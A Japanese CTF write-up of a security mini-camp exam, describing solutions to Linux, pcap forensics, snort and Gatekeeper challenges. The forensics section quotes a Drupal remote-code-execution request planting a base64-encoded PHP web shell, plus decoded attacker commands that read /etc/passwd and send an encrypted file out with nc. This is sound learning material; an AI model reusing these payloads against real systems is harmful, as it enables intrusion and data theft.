<p>セキュリティ・ミニキャンプ オンライン 2021 に参加し、修了試験のCTFに挑みました。結果、5問中4問正解することができました！<br>
<img src="https://storage.googleapis.com/zenn-user-upload/e94de1104b35-20211120.png" alt loading="lazy" class="md-img"><br>
<img src="https://storage.googleapis.com/zenn-user-upload/a2a3f61e50e5-20211120.png" alt loading="lazy" class="md-img"></p>
<h3 id="%E8%A7%A3%E3%81%91%E3%81%9F%E5%95%8F%E9%A1%8C">
<a class="header-anchor-link" href="#%E8%A7%A3%E3%81%91%E3%81%9F%E5%95%8F%E9%A1%8C" aria-hidden="true"></a> 解けた問題</h3>
<p>解いた順です。</p>
<ol>
<li>DAY3 Linuxシステムプログラミング</li>
<li>DAY2 サイバー攻撃対応入門</li>
<li>DAY2 マルウェアのトラフィックを分析・検知してみよう</li>
<li>DAY3 コンテナセキュリティ</li>
</ol>
<h3 id="%E8%A7%A3%E3%81%91%E3%81%AA%E3%81%8B%E3%81%A3%E3%81%9F%E5%95%8F%E9%A1%8C">
<a class="header-anchor-link" href="#%E8%A7%A3%E3%81%91%E3%81%AA%E3%81%8B%E3%81%A3%E3%81%9F%E5%95%8F%E9%A1%8C" aria-hidden="true"></a> 解けなかった問題</h3>
<ul>
<li>DAY1 ファイルシステム</li>
</ul>
<h1 id="%E8%A7%A3%E3%81%91%E3%81%9F%E5%95%8F%E9%A1%8C-1">
<a class="header-anchor-link" href="#%E8%A7%A3%E3%81%91%E3%81%9F%E5%95%8F%E9%A1%8C-1" aria-hidden="true"></a> 解けた問題</h1>
<h2 id="day3-linux%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9F%E3%83%B3%E3%82%B0">
<a class="header-anchor-link" href="#day3-linux%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9F%E3%83%B3%E3%82%B0" aria-hidden="true"></a> DAY3 Linuxシステムプログラミング</h2>
<p>sshで接続できるLinuxマシンがあり、そのマシンに置かれた実行ファイル<code>/try_running_me</code>を次の条件で起動せよという問題でした。</p>
<ul>
<li>
<code>argv[0]</code>を空文字列<code>""</code>にする</li>
<li>rootで起動する</li>
</ul>
<h4 id="argv%5B0%5D%E3%82%92%E7%A9%BA%E6%96%87%E5%AD%97%E5%88%97%22%22%E3%81%AB%E3%81%99%E3%82%8B">
<a class="header-anchor-link" href="#argv%5B0%5D%E3%82%92%E7%A9%BA%E6%96%87%E5%AD%97%E5%88%97%22%22%E3%81%AB%E3%81%99%E3%82%8B" aria-hidden="true"></a> <code>argv[0]</code>を空文字列<code>""</code>にする</h4>
<p><code>argv[0]</code>は普通実行ファイルのパスが入ります。シンボリックリンクを張ればシンボリックのパスが入るので、はじめはそれを考えましたが、ファイル名を空にすることはできなさそうなのでやめました。事前学習資料を見直していると<code>execve</code>システムコールで<code>argv</code>をすべて指定できることがわかり、これを使ったCのプログラムを書いて実行したところ、<code>argv[0]</code>を<code>""</code>にできていることを伝えるメッセージが表示されました。</p>
<h4 id="root%E3%81%A7%E8%B5%B7%E5%8B%95%E3%81%99%E3%82%8B">
<a class="header-anchor-link" href="#root%E3%81%A7%E8%B5%B7%E5%8B%95%E3%81%99%E3%82%8B" aria-hidden="true"></a> rootで起動する</h4>
<p>とりあえずsudoを試しましたが、当然防がれていました。講義でユーザー権限で起動したコンテナの中でroot（っぽい何か）になる方法があったのを思い出し、当該部分のプログラムを抜き出したプログラムを作成しました。実行するとフラグを得ることができました。</p>
<p>競技終了後の解説でunshareというコマンドが紹介されていました。手元の環境で試してみると</p>
<div class="code-block-container"><pre><code>$ unshare --map-root-user id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
</code></pre></div><p>となり、ちゃんとrootになっていて感動しました。</p>
<h2 id="day2-%E3%82%B5%E3%82%A4%E3%83%90%E3%83%BC%E6%94%BB%E6%92%83%E5%AF%BE%E5%BF%9C%E5%85%A5%E9%96%80">
<a class="header-anchor-link" href="#day2-%E3%82%B5%E3%82%A4%E3%83%90%E3%83%BC%E6%94%BB%E6%92%83%E5%AF%BE%E5%BF%9C%E5%85%A5%E9%96%80" aria-hidden="true"></a> DAY2 サイバー攻撃対応入門</h2>
<p>pcapファイルを分析して、サーバーから盗まれたデータを探す問題でした。<br>
Wiresharkで開いて眺めていると<code>192.168.180.175</code>へ<code>/CHANGELOG.txt</code>を要求しているHTTPのGETリクエストを見つけました。応答を見ると、<code>Drupal 7.54</code>というソフトウェアのようです。調べたところPHPで作られたCMSだそうです。ここからHTTPを使った攻撃を疑い、httpでフィルタしてみました。すると</p>
<div class="code-block-container"><pre class="language-http"><code class="language-http"><span class="token request-line"><span class="token method property">POST</span> <span class="token request-target url"><span class="token path"><span class="token path-separator">/</span></span><span class="token query"><span class="token query-delimiter">?</span><span class="token pair"><span class="token key">q</span>=<span class="token value">user/password</span></span><span class="token pair-delimiter">&amp;</span><span class="token pair"><span class="token key">name</span></span></span>[%23post_render][]=passthru&amp;name[%23type]=markup&amp;name[%23markup]=echo%20PD9waHAgaWYoaXNzZXQoJF9QT1NUWydjJ10pKXsgc3lzdGVtKGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUE9TVFsnYyddKSkpOyB9IA==%20|%20base64%20-d%20%3E%20create.php</span> <span class="token http-version property">HTTP/1.1</span></span>
</code></pre></div><p>という明らかに怪しい通信を見つけました。<a href="https://gchq.github.io/CyberChef/#recipe=URL_Decode()&amp;input=Lz9xPXVzZXIvcGFzc3dvcmQmbmFtZVslMjNwb3N0X3JlbmRlcl1bXT1wYXNzdGhydSZuYW1lWyUyM3R5cGVdPW1hcmt1cCZuYW1lWyUyM21hcmt1cF09ZWNobyUyMFBEOXdhSEFnYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWRqSjEwcEtYc2djM2x6ZEdWdEtHSmhjMlUyTkY5a1pXTnZaR1VvYzNSeVgzSnZkREV6S0NSZlVFOVRWRnNuWXlkZEtTa3BPeUI5SUE9PSUyMHwlMjBiYXNlNjQlMjAtZCUyMCUzRSUyMGNyZWF0ZS5waHA" target="_blank" rel="nofollow noopener noreferrer">cyberchefでURLデコード</a>したところ</p>
<div class="code-block-container"><pre><code>/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#type]=markup&amp;name[#markup]=echo PD9waHAgaWYoaXNzZXQoJF9QT1NUWydjJ10pKXsgc3lzdGVtKGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUE9TVFsnYyddKSkpOyB9IA== | base64 -d &gt; create.php
</code></pre></div><p>と出力されました。明らかに何かを<code>create.php</code>に書き込んでいます！含まれている<a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)&amp;input=UEQ5d2FIQWdhV1lvYVhOelpYUW9KRjlRVDFOVVd5ZGpKMTBwS1hzZ2MzbHpkR1Z0S0dKaGMyVTJORjlrWldOdlpHVW9jM1J5WDNKdmRERXpLQ1JmVUU5VFZGc25ZeWRkS1NrcE95QjlJQT09" target="_blank" rel="nofollow noopener noreferrer">Base64の文字列をデコード</a>してみると、PHPコードの断片らしきものが出てきました。</p>
<div class="code-block-container"><pre><code>&lt;?php if(isset($_POST['c'])){ system(base64_decode(str_rot13($_POST['c']))); } 
</code></pre></div><p>POSTリクエストの<code>c</code>キーで送られてきた文字列をrot13してbase64デコードしたものを実行するスクリプトのようです。<br>
フィルタに<code>http.request.method == POST</code>をセットして、<code>c</code>キーが含まれるPOSTリクエストを探しました。すると3つのリクエストがみつかりました。送信していたデータは以下の通り</p>
<ul>
<li><code>Form item: "c" = "L2S0VP9yqTZipTSmp3qxVN=="</code></li>
<li><code>Form item: "c" = "o3OyoaAmoPOuMKZgZwH2YJAvLlNgMFNgnJ4tMzkuMl50rUDtYJ91qPOzoTSaYzIhLlNgpTSmplOjLKAmBzAbLJ5aMI9ipUEco25sMI90o19xK2Mipy9xMJAlrKO0VN=="</code></li>
<li><code>Form item: "c" = "ozZtYKptZvNkBGVhZGL4YwR4ZP4kAwZtZGZmAlN8VTMfLJphMJ5w"</code></li>
</ul>
<p>これを<a href="https://gchq.github.io/CyberChef/#recipe=Fork('%5C%5Cn','%5C%5Cn',false)ROT13(true,true,false,13)From_Base64('A-Za-z0-9%2B/%3D',false)&amp;input=TDJTMFZQOXlxVFppcFRTbXAzcXhWTj09Cm8zT3lvYUFtb1BPdU1LWmdad0gyWUpBdkxsTmdNRk5nbko0dE16a3VNbDUwclVEdFlKOTFxUE96b1RTYVl6SWhMbE5ncFRTbXBsT2pMS0FtQnpBYkxKNWFNSTlpcFVFY28yNXNNSTkwbzE5eEsyTWlweTl4TUpBbHJLTzBWTj09Cm96WnRZS3B0WnZOa0JHVmhaR0w0WXdSNFpQNGtBd1p0WkdabUFsTjhWVE1mTEpwaE1KNXc" target="_blank" rel="nofollow noopener noreferrer">cyberchefでデコード</a>しました。</p>
<div class="code-block-container"><pre><code>cat /etc/passwd 
openssl aes-256-cbc -e -in flag.txt -out flag.enc -pass pass:change_option_e_to_d_for_decrypt 
nc -w 2 192.168.180.163 1337 &lt; flag.enc
</code></pre></div><p>どうやら盗まれたファイルは<code>flag.txt</code>で、これをopensslコマンドで暗号化してから'192.168.180.163'の'1337'番ポートに送信したようです。<br>
<code>ip.dst == 192.168.180.163 and tcp.port == 1337</code>でフィルタを掛けたところいくつか通信が表示されました。データがついているものは一つしかなかったのでこのデータを16進数でコピーし<a href="https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')&amp;input=NTM2MTZjNzQ2NTY0NWY1ZmFmZGUzY2M3ZDFhYjhlNGJkYTAwOTAxYmJiZTJhZGM5MTNmMDlmYWE2Zjc0MzVkNzc4ZmQyZTUzNThhNmU1YjQ5M2YxZGNmZmQzN2VhNDY4OGU1OTgzZTA1ZGFjNmVmNGExODdmNzIxOWYyMWIwMGU" target="_blank" rel="nofollow noopener noreferrer">cyberchefで元に戻して</a>ダウンロードしたファイルを<code>openssl</code>コマンドで複合しました。</p>
<div class="code-block-container"><pre><code>openssl aes-256-cbc -d -in flag.enc -out flag.txt -pass pass:change_option_e_to_d_for_decrypt
</code></pre></div><p><code>flag.txt</code>にフラグが出力され、フラグを得ることができました。</p>
<p>この問題を解くにあたってcyberchefに大いに助けられました。cyberchefはいいぞ！</p>
<h2 id="day2-%E3%83%9E%E3%83%AB%E3%82%A6%E3%82%A7%E3%82%A2%E3%81%AE%E3%83%88%E3%83%A9%E3%83%95%E3%82%A3%E3%83%83%E3%82%AF%E3%82%92%E5%88%86%E6%9E%90%E3%83%BB%E6%A4%9C%E7%9F%A5%E3%81%97%E3%81%A6%E3%81%BF%E3%82%88%E3%81%86">
<a class="header-anchor-link" href="#day2-%E3%83%9E%E3%83%AB%E3%82%A6%E3%82%A7%E3%82%A2%E3%81%AE%E3%83%88%E3%83%A9%E3%83%95%E3%82%A3%E3%83%83%E3%82%AF%E3%82%92%E5%88%86%E6%9E%90%E3%83%BB%E6%A4%9C%E7%9F%A5%E3%81%97%E3%81%A6%E3%81%BF%E3%82%88%E3%81%86" aria-hidden="true"></a> DAY2 マルウェアのトラフィックを分析・検知してみよう</h2>
<p>snortのルールにマッチするパケットを送信せよという問題でした。snortのルールを読んだところ、UDPかつ指定された文字列が含まれているものにマッチするようになっていたので、</p>
<div class="code-block-container"><pre><code>echo "指定された文字列" | nc -u 指定されたip 指定されたport
</code></pre></div><p>を実行したところフラグがこちらに送られ、端末に表示されました。</p>
<h2 id="day3-%E3%82%B3%E3%83%B3%E3%83%86%E3%83%8A%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">
<a class="header-anchor-link" href="#day3-%E3%82%B3%E3%83%B3%E3%83%86%E3%83%8A%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3" aria-hidden="true"></a> DAY3 コンテナセキュリティ</h2>
<p>コンテナのイメージの指定でダイジェスト（SHA-256 ハッシュ値）が使われていないものを拒否するGatekeeper用のポリシーをRegoで実装するという問題でした。KubernetesやGatekeeperをまだあまり理解できていなかったため後回しにしていたのですが、終了20分前ごろに大ヒントが追加され、正規表現を書ければ解けそうだったので取り組みました。</p>
<div class="code-block-container"><pre><code>{image-name}@sha256:{ハッシュ値}
</code></pre></div><p>大ヒントで上記のような文字列以外にマッチしない正規表現を作ればよいことが分かりました。sha256のハッシュ値にマッチする正規表現をググったところ、<code>[A-Fa-f0-9]{64}</code>を見つけたのでこれをありがたく使わせてもらいました。</p>
<p>一度目の提出は正規表現を<code>ubuntu@sha256:[A-Fa-f0-9]{64}</code>にしてimage-nameをubuntuで固定にしてしまっていたので不正解。二度目は<code>.*@sha256:[A-Fa-f0-9]{64}</code>でimage-nameが空でもマッチしてしまい不正解。三度目の正直でフラグを得ることができました。この時、競技終了2分前でした。</p>
<p>最終的に提出したものはこちら。</p>
<div class="code-block-container"><pre><code>package example

violation[{"msg": msg}] {
    c := input.review.object.spec.containers[_]
    not re_match(".+@sha256:[A-Fa-f0-9]{64}", c.image)
    msg := "ダメです"
}
</code></pre></div><h1 id="%E8%A7%A3%E3%81%91%E3%81%AA%E3%81%8B%E3%81%A3%E3%81%9F%E5%95%8F%E9%A1%8C-1">
<a class="header-anchor-link" href="#%E8%A7%A3%E3%81%91%E3%81%AA%E3%81%8B%E3%81%A3%E3%81%9F%E5%95%8F%E9%A1%8C-1" aria-hidden="true"></a> 解けなかった問題</h1>
<h2 id="day1-%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0">
<a class="header-anchor-link" href="#day1-%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0" aria-hidden="true"></a> DAY1 ファイルシステム</h2>
<p>sdカードのダンプファイルが与えられるので、それを分析してフラグを取り出す問題でした。<br>
時間がかかりそうだったので後回しにし、結局時間が足りず戻ることはできませんでした。競技終了後の解説ではファイルをマウントして分析を進められていたのですが、そもそもファイルをマウントするという発想がなかったので時間があっても解けたかどうかは相当あやしいです。</p>
<h1 id="%E6%84%9F%E6%83%B3">
<a class="header-anchor-link" href="#%E6%84%9F%E6%83%B3" aria-hidden="true"></a> 感想</h1>
<p>講義の内容が問題に反映されていて、よい復習になりました。とても楽しいCTFでした。ありがとうございました！</p>


セキュリティ・ミニキャンプ オンライン 2021 修了試験 writeup

DAY3 Linuxシステムプログラミング

DAY2 マルウェアのトラフィックを分析・検知してみよう

セキュリティ・ミニキャンプオンライン 2021 修了試験 writeup

Discussion